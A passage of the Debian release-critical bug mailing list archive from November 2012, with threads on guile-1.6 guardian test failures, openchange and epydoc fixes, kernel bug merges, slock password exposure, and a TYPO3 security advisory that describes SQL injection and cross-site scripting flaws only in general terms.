Hg0BbH7hnXSBYH4QK22rUh5DkG8lcH5300SOF2rqhW8vArwhymMWIA133lGlipSs
4IIlbuIgL7RpWma8iXhs56gzkqHrnsjTCI5uHdCuYLMyUW9JQsTrO7wMdMKf2p97
4DT+9OwHbiDmohAZQyujBSwKKaMhzyZ1vqxAIlbjQc2XDvhS0uwInhQBSuffPefL
0NLPeIbUNMIOoklHkuev
=95hj
-END PGP SIGNATUREEnd Message---


Bug#689687: guile-1.6: FTBFS on i386, kfreebsd-i386: testsuite failures

2012-11-08 Thread Daniel Hartwig

Ludovic,

I note that a few years ago you relaxed these tests to “(throw
'unresolved)” due to the problems with testing garbage collection.

If you have time, please briefly review my comments below, and whether
it is sane to also relax these tests in Debian's guile-1.6 package (see
attached).  I will also be investigating this further to confirm that
guardians are working as expected with this version.

Regards

Andreas Beckmann deb...@abeckmann.de wrote:
 guile-1.6 does FTBFS on i386 and kfreebsd-i386 (but not hurd-i386) with
 a testsuite failure, see
 https://buildd.debian.org/status/package.php?p=guile-1.6

 I can reproduce this locally in a i386 pbuilder chroot on amd64.
 Previous buildd builds for kfreebsd-i386 have succeeded on different hosts, 
 but
 there haven't been any i386 buildd builds for the last 3 years, as the 
 maintainer
 builds were done on i386.


 FAIL: guardians.test: g1-garbage saved
 FAIL: guardians.test: g2-saved
 FAIL: guardians.test: g2-garbage saved

[Background: I am a guile user, sometimes contributor, some experience
using guardians.]

These particular tests have long had trouble passing, although this does
not strictly indicate failure.  They make some assumptions about the
order and completeness of garbage collection which (I believe) can not
actually be asserted.

This is documented in guardians.test:

;;; These tests make some questionable assumptions.
;;; - They assume that a GC will find all dead objects, so they
;;;   will become flaky if we have a generational GC.
;;; - They assume that objects won't be saved by the guardian until
;;;   they explicitly invoke GC --- in other words, they assume that GC
;;;   won't happen too often.

and this additional comment is later inserted upstream:

;;; - More generally, when a weakly referenced object doesn't disappear as
;;;   expected, it's hard to tell whether that's because of a guardian bug of
;;;   because a reference to it is being held somewhere, e.g., one some part
;;;   of the stack that hasn't been overwritten.  Thus, most tests cannot
;;;   fail, they can just throw `unresolved'.  We try hard to clear
;;;   references that may have been left on the stacks (see clear refs left
;;;   on the stack lines).

Another problem is that they use symbols, which are globally interned
(and thus, not garbage collected in all cases).  Upstream later changed
changed these to strings, making the tests more reliable.

In subsequent revisions, “g1-garbage saved” has been removed, and the
other two tests have been relaxed so that they result in “unresolved”
rather than failure.

The test g1-garbage not collected yet strongly relies on the second
assumption.  It is a poor test, even though it seems to pass ok.
Upstream has removed this test also.

The upstream changes can be seen at:
http://git.savannah.gnu.org/gitweb/?p=guile.git;a=history;f=test-suite/tests/guardians.test;hb=HEAD

These are relevant:

commit 6a7489ace3f07a8d190110cd1244963526c65729
Author: Ludovic Courtès l...@gnu.org
Date:   Sat Feb 28 16:51:19 2009 +0100

Increase chances that `guardians.test' can be successfully run.

commit e13f1cbdffa4f333d9866d1b22cd2c9a3b17b3bd
Author: Ludovic Courtes ludovic.cour...@laas.fr
Date:   Sun Jun 25 22:43:20 2006 +

Fixed `guardians.test' so that it does not use symbols.

commit 2924541ba0b1ec65ef377f3828333c3268e464b9
Author: Marius Vollmer m...@zagadka.de
Date:   Sun Jul 31 23:16:45 2005 +

Adapted to new (original) semantics.  test guardingobjects multiple
times.

 This is blocking 1.6.8-10.2 which fixes one RC bug to be ready for
 going to testing.

Given that the tests fail only on some i386 archs, it may be reasonable
to relax those tests which it makes sense to, and change the use of
symbols to strings.  See attached patch.

I will follow up after investigating more whether something is actually
broken here.  Maybe to do with other debian patches, which I have not
looked at yet.

Regards
--- a/test-suite/tests/guardians.test	2012-11-08 21:42:40.109690325 +0800
+++ b/test-suite/tests/guardians.test	2012-11-08 22:42:13.185701083 +0800
@@ -28,19 +28,21 @@
 (gc)
 
 (define g1 (make-guardian))
-(define not-g1-garbage (list 'not-g1-garbage))
+(define not-g1-garbage (list (string-copy not-g1-garbage)))
 (g1 not-g1-garbage)
-(g1 (list 'g1-garbage))
+(g1 (list (string-copy g1-garbage)))
 (pass-if g1-garbage not collected yet (equal? (g1) #f))
 (gc)
-(pass-if g1-garbage saved (equal? (g1) '(g1-garbage)))
+(pass-if g1-garbage saved (or (equal? (g1)
+	(list (string-copy g1-garbage)))
+(throw 'unresolved)))
 
 ;;; Who guards the guardian?
 (gc)
 (define g2 (make-guardian))
-(g2 (list 'g2-garbage))
+(g2 (list (string-copy g2-garbage)))
 (define g3 (make-guardian))
-(g3 (list 'g3-garbage))
+(g3 (list (string-copy g3-garbage)))
 (g3 g2)
 (pass-if g2-garbage not collected yet (equal? (g2) #f))
 (pass-if g3-garbage not collected yet (equal? (g3) #f))
@@ -54,12 +56,16 @@
   (if saved
 	  (begin
 	(cond

Processed: limit source to openchange, tagging 692727

2012-11-08 Thread Debian Bug Tracking System
Processing commands for cont...@bugs.debian.org:

 #openchange (1:1.0-3) unstable; urgency=medium
 #
 #  * Add 04_ndr_noalign: Fix handling of non-small emails. Closes: #692727
 #
 limit source openchange
Limiting to bugs with field 'source' containing at least one of 'openchange'
Limit currently set to 'source':'openchange'

 tags 692727 + pending
Bug #692727 [libmapi0] libmapi0: MAPI_E_CALL_FAILED (0x80004005) in Evolution 
when sending mails or creating appointments
Added tag(s) pending.
 thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
692727: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=692727
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems


--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#692727: marked as done (libmapi0: MAPI_E_CALL_FAILED (0x80004005) in Evolution when sending mails or creating appointments)

2012-11-08 Thread Debian Bug Tracking System
Your message dated Thu, 08 Nov 2012 15:32:47 +
with message-id e1twu63-0002ri...@franck.debian.org
and subject line Bug#692727: fixed in openchange 1:1.0-3
has caused the Debian Bug report #692727,
regarding libmapi0: MAPI_E_CALL_FAILED (0x80004005) in Evolution when sending 
mails or creating appointments
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
692727: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=692727
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
---BeginMessage---
Package: libmapi0
Version: 1:1.0-2
Severity: normal
Tags: upstream patch

Hi,

a change in samba4 causes evolution-mapi to fail on sending mail, except
for very small mails, or creating new appointments.

There is a workaround for openchange that consists of a patch for
exchange.idl.
It is attached. I rebuilt the openchange package with this fix and it
fixes
my Evolution issue.

This is the upstream bug:

https://bugzilla.gnome.org/show_bug.cgi?id=682449

Regards,
Tino
-- System Information:
Debian Release: wheezy/sid
  APT prefers testing
  APT policy: (500, 'testing')
Architecture: amd64 (x86_64)
Foreign Architectures: i386

Kernel: Linux 3.2.0-4-amd64 (SMP w/2 CPU cores)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash

Versions of packages libmapi0 depends on:
ii  libc6  2.13-35
ii  libdcerpc0 4.0.0~beta2+dfsg1-3
ii  libldb11:1.1.6-1
ii  libndr04.0.0~beta2+dfsg1-3
ii  libsamba-credentials0  4.0.0~beta2+dfsg1-3
ii  libsamba-hostconfig0   4.0.0~beta2+dfsg1-3
ii  libsamba-util0 4.0.0~beta2+dfsg1-3
ii  libtalloc2 2.0.7+git20120207-1
ii  libtevent0 0.9.16-1
ii  multiarch-support  2.13-35

libmapi0 recommends no packages.

libmapi0 suggests no packages.

-- no debconf information


Author: Jelmer Vernooij jel...@openchange.org
Status: cherry-picked from upstream
Description: Fix symbolic link creation for shared libaries (which have a 
somewhat inconsistent soversion)

=== modified file 'exchange.idl'
Index: exchange.idl
===
--- old/exchange.idl(revision 4004)
+++ new/exchange.idl(working copy)
@@ -1039,7 +1039,7 @@
[case(ActionType_OP_COPY)]  MoveCopy_Action 
CopyAction;
[case(ActionType_OP_REPLY)] ReplyOOF_Action 
ReplyAction;
[case(ActionType_OP_OOF_REPLY)] ReplyOOF_Action 
ReplyOOFAction;
-   [case(ActionType_OP_DEFER_ACTION)][flag(NDR_REMAINING)] 
DATA_BLOB   DeferAction;
+   
[case(ActionType_OP_DEFER_ACTION)][flag(NDR_REMAINING|NDR_NOALIGN)] DATA_BLOB   
DeferAction;
[case(ActionType_OP_BOUNCE)]BounceCode  
BounceCode;
[case(ActionType_OP_TAG)]   mapi_SPropValue_wrap
PropValue;
[case(ActionType_OP_FORWARD)]   ForwardDelegate_Action  
ForwardAction;
@@ -1057,7 +1057,7 @@
 
typedef [flag(NDR_NOALIGN)] struct {
uint16  ActionLength;
-   
[subcontext(0),subcontext_size(ActionLength),flag(NDR_REMAINING)] 
ActionBlockData ActionBlockData;
+   
[subcontext(0),subcontext_size(ActionLength),flag(NDR_REMAINING|NDR_NOALIGN)] 
ActionBlockData ActionBlockData;
} ActionBlock;
 
typedef [flag(NDR_NOALIGN)] struct {
@@ -1095,7 +1095,7 @@
 
typedef [public,flag(NDR_NOALIGN)] struct {
uint16  cValues;
-   [flag(NDR_REMAINING)]mapi_SPropValuelpProps[cValues];
+   [flag(NDR_REMAINING|NDR_NOALIGN)]mapi_SPropValue
lpProps[cValues];
} mapi_SPropValue_array;
 
typedef [flag(NDR_NOALIGN)] struct {
@@ -1281,7 +1281,7 @@
 // TODO: figure out if layout can go
uint8   
layout;
 // TODO: convert this to a proper structure - see if we already have one.
-   [flag(NDR_REMAINING)] DATA_BLOB 
prop_values;
+   [flag(NDR_REMAINING|NDR_NOALIGN)] DATA_BLOB 
prop_values;
} RecipientRow;
 
typedef [flag(NDR_NOALIGN)] struct {
@@ -1356,7 +1356,7 @@
 
typedef [flag(NDR_NOALIGN)] struct {
uint8   layout;
-   [flag(NDR_REMAINING)] 

Bug#692733: src:epydoc: non-free files in main (CC-BY-NC-SA)

2012-11-08 Thread Edward Loper
Epydoc itself is released under the MIT license:
http://epydoc.sourceforge.net/license.html

The page in question is specifying the license for the powerpoint
slides and video from my presentation at PyCon 2004.  I'm not sure
whether those slides/video are curently included in the debian
package.  I would think not -- i.e., I believe that that page just has
pointers to externally hosted files such as
http://www.pycon.org/dc2004/talks/files/epydoc/pycon-epydoc-large.mov.
 So I'm not sure what the problem is.

But at any rate, I'm the owner of both epydoc and of those powerpoint
slides and videos, and would be happy to release them under a more
permissive license if you wish.

-Edward

On Thu, Nov 8, 2012 at 6:43 AM, Ansgar Burchardt ans...@debian.org wrote:
 Package: src:epydoc
 Version: 3.0.1-12
 Severity: serious

 Files: doc/pycon-epydoc.html
 Copyright: 2004 Edward Loper
 License: CC-BY-NC-SA

 That's a non-free license and not appropriate for Debian.

 Ansgar



-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Processed: Re: Intel DH77EB (H77): sporadic freeze and increased power consumption

2012-11-08 Thread Debian Bug Tracking System
Processing commands for cont...@bugs.debian.org:

 fixed 689268 linux-2.6/3.3~rc6-1~experimental.1
Bug #689268 [src:linux] linux-image-3.2.0-3-amd64: Intel HD 4000 (Ivy Bridge) 
graphics freeze
Bug #692500 [src:linux] [linux-image-amd64] system freezes with Ivy Brigde CPU
Marked as fixed in versions linux-2.6/3.3~rc6-1~experimental.1.
Marked as fixed in versions linux-2.6/3.3~rc6-1~experimental.1.
 forcemerge 689268 692234
Bug #689268 [src:linux] linux-image-3.2.0-3-amd64: Intel HD 4000 (Ivy Bridge) 
graphics freeze
Bug #692500 [src:linux] [linux-image-amd64] system freezes with Ivy Brigde CPU
Bug #692234 [src:linux] Intel DH77EB (H77): sporadic freeze and increased power 
consumption during interactive use
Severity set to 'serious' from 'important'
Marked as fixed in versions linux-2.6/3.3.6-1~experimental.1, 
linux/3.5.5-1~experimental.1, and linux-2.6/3.3~rc6-1~experimental.1.
Bug #692500 [src:linux] [linux-image-amd64] system freezes with Ivy Brigde CPU
Merged 689268 692234 692500
 quit
Stopping processing here.

Please contact me if you need assistance.
-- 
689268: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=689268
692234: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=692234
692500: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=692500
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems


--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#692733: src:epydoc: non-free files in main (CC-BY-NC-SA)

2012-11-08 Thread Kenneth Pronovici
On Thu, Nov 8, 2012 at 9:48 AM, Edward Loper edlo...@gmail.com wrote:
 Epydoc itself is released under the MIT license:
 http://epydoc.sourceforge.net/license.html

 The page in question is specifying the license for the powerpoint
 slides and video from my presentation at PyCon 2004.  I'm not sure
 whether those slides/video are curently included in the debian
 package.  I would think not -- i.e., I believe that that page just has
 pointers to externally hosted files such as
 http://www.pycon.org/dc2004/talks/files/epydoc/pycon-epydoc-large.mov.
  So I'm not sure what the problem is.

Hi Edward,

The Debian package contains just one file under this license:
doc/pycon-epydoc.html, which is basically a short pointer to the other
slides/videos on the pycon.org website (those slides/videos are not
included in the Debian package).

The simplest thing for now is to just remove that one file from the
Debian package, since it doesn't really need to be there.  That will
resolve the bug.

I've already got a patch checked into my revision control. I'll upload
a new Debian package later today when I can get access to my build
environment.  I'll also coordinate with the release managers to get
the new changes accepted into Wheezy (since this is considered a
release-critical bug and we're in freeze).

KEN

-- 
Kenneth J. Pronovici prono...@ieee.org
http://www.cedar-solutions.com/


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Processed: [bts-link] source package icedove

2012-11-08 Thread Debian Bug Tracking System
Processing commands for cont...@bugs.debian.org:

 #
 # bts-link upstream status pull for source package icedove
 # see http://lists.debian.org/debian-devel-announce/2006/05/msg1.html
 #
 user bts-link-upstr...@lists.alioth.debian.org
Setting user to bts-link-upstr...@lists.alioth.debian.org (was 
bts-link-de...@lists.alioth.debian.org).
 # remote status report for #601226 (http://bugs.debian.org/601226)
 # Bug title: [iceowl-extension] please make possible to show calendar with 
 icedove -calendar command
 #  * https://bugzilla.mozilla.org/show_bug.cgi?id=359807
 #  * remote status changed: (?) - ASSIGNED
 usertags 601226 + status-ASSIGNED
There were no usertags set.
Usertags are now: status-ASSIGNED.
 # remote status report for #692331 (http://bugs.debian.org/692331)
 # Bug title: icedove apprently uses mboxo format, which irrecoverably 
 corrupts mail
 #  * https://bugzilla.mozilla.org/show_bug.cgi?id=121947
 #  * remote status changed: (?) - NEW
 forwarded 692331 https://bugzilla.mozilla.org/show_bug.cgi?id=808450, 
 merged-upstream: https://bugzilla.mozilla.org/show_bug.cgi?id=121947
Bug #692331 [icedove] icedove apprently uses mboxo format, which irrecoverably 
corrupts mail
Changed Bug forwarded-to-address to 
'https://bugzilla.mozilla.org/show_bug.cgi?id=808450, merged-upstream: 
https://bugzilla.mozilla.org/show_bug.cgi?id=121947' from 
'https://bugzilla.mozilla.org/show_bug.cgi?id=808450'
 usertags 692331 + status-NEW
There were no usertags set.
Usertags are now: status-NEW.
 thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
692331: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=692331
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems


--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Processed: [bts-link] source package accountsservice

2012-11-08 Thread Debian Bug Tracking System
Processing commands for cont...@bugs.debian.org:

 #
 # bts-link upstream status pull for source package accountsservice
 # see http://lists.debian.org/debian-devel-announce/2006/05/msg1.html
 #
 user bts-link-upstr...@lists.alioth.debian.org
Setting user to bts-link-upstr...@lists.alioth.debian.org (was 
bts-link-de...@lists.alioth.debian.org).
 # remote status report for #674419 (http://bugs.debian.org/674419)
 # Bug title: gnome-shell: segfaults in libaccountservice
 #  * https://bugs.freedesktop.org/show_bug.cgi?id=50112
 #  * remote status changed: REOPENED - RESOLVED
 #  * remote resolution changed: (?) - FIXED
 #  * closed upstream
 tags 674419 + fixed-upstream
Bug #674419 [libaccountsservice0] gnome-shell: segfaults in libaccountservice
Bug #673185 {Done: Alessio Treglia ales...@debian.org} [libaccountsservice0] 
gnome-shell: segfault in libaccountsservice.so.0.0.0
Bug #673211 [libaccountsservice0] gnome-shell: segfault in 
libaccountsservice.so.0.0.0
Added tag(s) fixed-upstream.
Added tag(s) fixed-upstream.
Added tag(s) fixed-upstream.
 usertags 674419 - status-REOPENED
Usertags were: status-REOPENED.
Usertags are now: .
 usertags 674419 + status-RESOLVED resolution-FIXED
There were no usertags set.
Usertags are now: status-RESOLVED resolution-FIXED.
 # remote status report for #674419 (http://bugs.debian.org/674419)
 # Bug title: gnome-shell: segfaults in libaccountservice
 #  * https://bugs.freedesktop.org/show_bug.cgi?id=50112
 #  * remote status changed: REOPENED - RESOLVED
 #  * remote resolution changed: (?) - FIXED
 #  * closed upstream
 tags 674419 + fixed-upstream
Bug #674419 [libaccountsservice0] gnome-shell: segfaults in libaccountservice
Bug #673185 {Done: Alessio Treglia ales...@debian.org} [libaccountsservice0] 
gnome-shell: segfault in libaccountsservice.so.0.0.0
Bug #673211 [libaccountsservice0] gnome-shell: segfault in 
libaccountsservice.so.0.0.0
Ignoring request to alter tags of bug #674419 to the same tags previously set
Ignoring request to alter tags of bug #673185 to the same tags previously set
Ignoring request to alter tags of bug #673211 to the same tags previously set
 usertags 674419 - status-REOPENED
Usertags were: status-RESOLVED resolution-FIXED.
Usertags are now: status-RESOLVED resolution-FIXED.
 usertags 674419 + status-RESOLVED resolution-FIXED
Usertags were: status-RESOLVED resolution-FIXED.
Usertags are now: status-RESOLVED resolution-FIXED.
 thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
673185: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=673185
673211: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=673211
674419: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=674419
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems


--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#692733: src:epydoc: non-free files in main (CC-BY-NC-SA)

2012-11-08 Thread Edward Loper
Sounds good to me (and now that I look more closely, the links appear
to be broken anyway -- I guess the pycon.org/dc2004 page went away)

Thanks,
-Edward

On Thu, Nov 8, 2012 at 11:01 AM, Kenneth Pronovici prono...@ieee.org wrote:
 The Debian package contains just one file under this license:
 doc/pycon-epydoc.html, which is basically a short pointer to the other
 slides/videos on the pycon.org website (those slides/videos are not
 included in the Debian package).

 The simplest thing for now is to just remove that one file from the
 Debian package, since it doesn't really need to be there.  That will
 resolve the bug.


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#590521: marked as done (gtk2-engines-qtcurve: modifies iceweasel configuration file)

2012-11-08 Thread Piotr Engelking
found 590521 1.8.15-3
thanks

Boris Pek tehnic...@mail.ru wrote:

 * Build with -DQTC_MODIFY_MOZILLA=false:
   do not modify Iceweasel and/or Firefox settings. (Closes: #590521)
 Again?
 http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=590521#24
 http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=590521#29

 This file is not created or modified now. Is not this is an expected result?

Version 1.8.15-3 of gtk2-engines-qtcurve still appends the snippet to
~/.mozilla/firefox/*.default/chrome/userChrome.css.


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Processed: Re: Bug#590521: marked as done (gtk2-engines-qtcurve: modifies iceweasel configuration file)

2012-11-08 Thread Debian Bug Tracking System
Processing commands for cont...@bugs.debian.org:

 found 590521 1.8.15-3
Bug #590521 {Done: Boris Pek tehnic...@mail.ru} [gtk2-engines-qtcurve] 
gtk2-engines-qtcurve: modifies iceweasel configuration file
Marked as found in versions gtk2-engines-qtcurve/1.8.15-3; no longer marked as 
fixed in versions gtk2-engines-qtcurve/1.8.15-3 and reopened.
 thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
590521: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=590521
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems


--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#692775: TYPO3-CORE-SA-2012-005: Several Vulnerabilities in TYPO3 Core

2012-11-08 Thread Christian Welzel
Package: typo3-src
Severity: critical
Tags: security


It has been discovered that TYPO3 Core is vulnerable to SQL Injection,
Information Disclosure and Cross-Site Scripting

Component Type: TYPO3 Core

Affected Versions: 4.5.0 up to 4.5.20, 4.6.0 up to 4.6.13, 4.7.0 up to
4.7.5 and development releases of the 6.0 branch.
Vulnerability Types: SQL Injection, Cross-Site Scripting, Information
Disclosure
Overall Severity: Medium
Release Date: November 8, 2012



Vulnerable subcomponent: TYPO3 Backend History Module


Vulnerability Type: SQL Injection, Cross-Site Scripting
Severity: Medium
Suggested CVSS v2.0: AV:N/AC:M/Au:S/C:C/I:C/A:N/E:F/RL:O/RC:C

Problem Description: Due to missing encoding of user input, the history
module is susceptible to SQL Injection and Cross-Site Scripting. A valid
backend login is required to exploit this vulnerability.


Vulnerability Type: Information Disclosure
Severity: Low
Suggested CVSS v2.0: AV:N/AC:L/Au:S/C:P/I:N/A:N/E:F/RL:O/RC:C

Problem Description: Due to a missing access check, regular editors
could see the history view of arbitrary records, only by forging a
proper URL for the History Module. A valid backend login is required to
exploit this vulnerability.



Vulnerable subcomponent: TYPO3 Backend API


Vulnerability Type: Cross-Site Scripting
Severity: Low
Suggested CVSS v2.0: AV:N/AC:M/Au:S/C:N/I:P/A:N/E:F/RL:O/RC:C

Problem Description: Failing to properly HTML-encode user input the tree
render API (TCA-Tree) is susceptible to Cross-Site Scripting. TYPO3
Versions below 6.0 does not make us of this API, thus is not
exploitable, if no third party extension is installed which uses this
API. A valid backend login is required to exploit this vulnerability.


Vulnerability Type: Cross-Site Scripting
Severity: Low
Suggested CVSS v2.0: AV:N/AC:M/Au:S/C:N/I:P/A:N/E:P/RL:O/RC:C

Problem Description: Failing to properly encode user input, the function
menu API is susceptible to Cross-Site Scripting. A valid backend login
is required to exploit this vulnerability.


-- 
 MfG, Christian Welzel

  GPG-Key: http://www.camlann.de/de/pgpkey.html
  Fingerprint: 4F50 19BF 3346 36A6 CFA9 DBDC C268 6D24 70A1 AD15


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#692737: suckless-tools: newer slock versions prevents unwanted exposure of passwords

2012-11-08 Thread Vasudev Kamath
Hi Nico,

Thanks for the report!

On 13:16 Thu 08 Nov , Nico Golde wrote:
 Package: suckless-tools
 Version: 38-2
 Severity: grave
 Justification: user security hole
 
 
 Hey,
 this package has not updated any of the tools included since two years.
 Please package newer tools, especially but most important slock.

As per the freeze policy I can't really introduce new things into Wheezy
so I didn't consider putting new versions into 38-2. I'm preparing 39
version with all bugs closed and latest version of software but it will
not be in wheezy and will be backported once wheezy is stable.

 
 The current version of slock has no indication whatsoever that a screen lock 
 is active.
 After a longer idle period of the display, it is therefore impossible to 
 distinguish between a locked
 screen and an inactive screen. As a result, it is not too difficult to write 
 your password somewhere
 you don't want to because you assumed the screen was locked.
 Hence I marked this as grave, this happened to me multiple times.
 
 Newer slock versions have a color indication once you hit the first key on 
 the keyboard that shows
 you that the lock is active.

But If I understand correctly it is not a bug but that is how slock was
designed previously and patch was later submitted to colourise and give
more features to slock which was later merged by Anselm to prepare 1.1
version. So can you please reconsider on the severity of the bug?

Now coming to the colourising feature are you talking about this
specific commit[1] or all the 3 new patches from the tip? If this is the
single patch you meant then I will try to cherrypick it but again I
don't know new unblock request will be entertained by release team [2]

PS: I will be on vacation for a week from tomorrow so I'm really not
sure if I will be able to finish this package soon. If you can prepare
an NMU I'll be happy with that :-). Only thing is I don't want package
to be removed from Wheezy because multiple packages depend on it.


[1] http://hg.suckless.org/slock/diff/0eade055cef0/slock.c
[2] http://lists.debian.org/debian-devel-announce/2012/11/msg3.html

Warm Regards
-- 
Vasudev Kamath
http://copyninja.info
Connect on ~friendica: copyninja@{frndk.de | vasudev.homelinux.net}
IRC nick: copyninja | vasudev {irc.oftc.net | irc.freenode.net}
GPG Key: C517 C25D E408 759D 98A4  C96B 6C8F 74AE 8770 0B7E


signature.asc
Description: Digital signature


Processed: your mail

2012-11-08 Thread Debian Bug Tracking System
Processing commands for cont...@bugs.debian.org:

 severity 692776 serious
Bug #692776 [python-pyatspi2] python-pyatspi2: Error during apt-get 
dist-upgrade (wheezy-sid): Could not perform immediate configuration on 
'python-pyatspi2'
Severity set to 'serious' from 'normal'
 merge 691160 692776
Bug #691160 [python-pyatspi2] broken upgrade path from python-pyatspi to 
python-pyatspi2
Bug #692776 [python-pyatspi2] python-pyatspi2: Error during apt-get 
dist-upgrade (wheezy-sid): Could not perform immediate configuration on 
'python-pyatspi2'
Merged 691160 692776
 tags 691160 +confirmed
Bug #691160 [python-pyatspi2] broken upgrade path from python-pyatspi to 
python-pyatspi2
Bug #692776 [python-pyatspi2] python-pyatspi2: Error during apt-get 
dist-upgrade (wheezy-sid): Could not perform immediate configuration on 
'python-pyatspi2'
Added tag(s) confirmed.
Added tag(s) confirmed.
 thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
691160: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=691160
692776: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=692776
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems


--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Processed: notfound 692103 in 1.5.3-1

2012-11-08 Thread Debian Bug Tracking System
Processing commands for cont...@bugs.debian.org:

 notfound 692103 1.5.3-1
Bug #692103 {Done: Christoph Berg m...@debian.org} [pgbouncer] pgbouncer: 
add_database: fail gracefully if too long db name
Ignoring request to alter found versions of bug #692103 to the same values 
previously set
 thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
692103: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=692103
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems


--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Processed: fixed 692103 in 1.5.3-1

2012-11-08 Thread Debian Bug Tracking System
Processing commands for cont...@bugs.debian.org:

 fixed 692103 1.5.3-1
Bug #692103 {Done: Christoph Berg m...@debian.org} [pgbouncer] pgbouncer: 
add_database: fail gracefully if too long db name
Marked as fixed in versions pgbouncer/1.5.3-1.
 thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
692103: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=692103
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems


--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Processed: Adjusting #688299

2012-11-08 Thread Debian Bug Tracking System
Processing commands for cont...@bugs.debian.org:

 # Cloning and adjusting severities and affected versions,
 # because Wheezy is not affected by the RC part of the bug
 clone 688299 -1
Bug #688299 [libpolyorb3] libpolyorb3: using diversions in M-A: same packages 
is a bad idea
Bug 688299 cloned as bug 692780
 severity 688299 normal
Bug #688299 [libpolyorb3] libpolyorb3: using diversions in M-A: same packages 
is a bad idea
Severity set to 'normal' from 'serious'
 notfound 688299 2.8~20110207-5
Bug #688299 [libpolyorb3] libpolyorb3: using diversions in M-A: same packages 
is a bad idea
No longer marked as found in versions polyorb/2.8~20110207-5.
 close 688299 2.8~20110207-5
Bug #688299 [libpolyorb3] libpolyorb3: using diversions in M-A: same packages 
is a bad idea
Marked as fixed in versions polyorb/2.8~20110207-5.
Bug #688299 [libpolyorb3] libpolyorb3: using diversions in M-A: same packages 
is a bad idea
Marked Bug as done
 notfound -1 2.8~20110207-4
Bug #692780 [libpolyorb3] libpolyorb3: using diversions in M-A: same packages 
is a bad idea
No longer marked as found in versions polyorb/2.8~20110207-4.
 retitle -1 libpolyorb3: does not clean up obsolete diversion
Bug #692780 [libpolyorb3] libpolyorb3: using diversions in M-A: same packages 
is a bad idea
Changed Bug title to 'libpolyorb3: does not clean up obsolete diversion' from 
'libpolyorb3: using diversions in M-A: same packages is a bad idea'
 thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
688299: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=688299
692780: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=692780
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems


--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Processed: tagging as pending bugs that are closed by packages in NEW

2012-11-08 Thread Debian Bug Tracking System
Processing commands for cont...@bugs.debian.org:

 # Thursday 8 November  19:03:08 UTC 2012
 # Tagging as pending bugs that are closed by packages in NEW
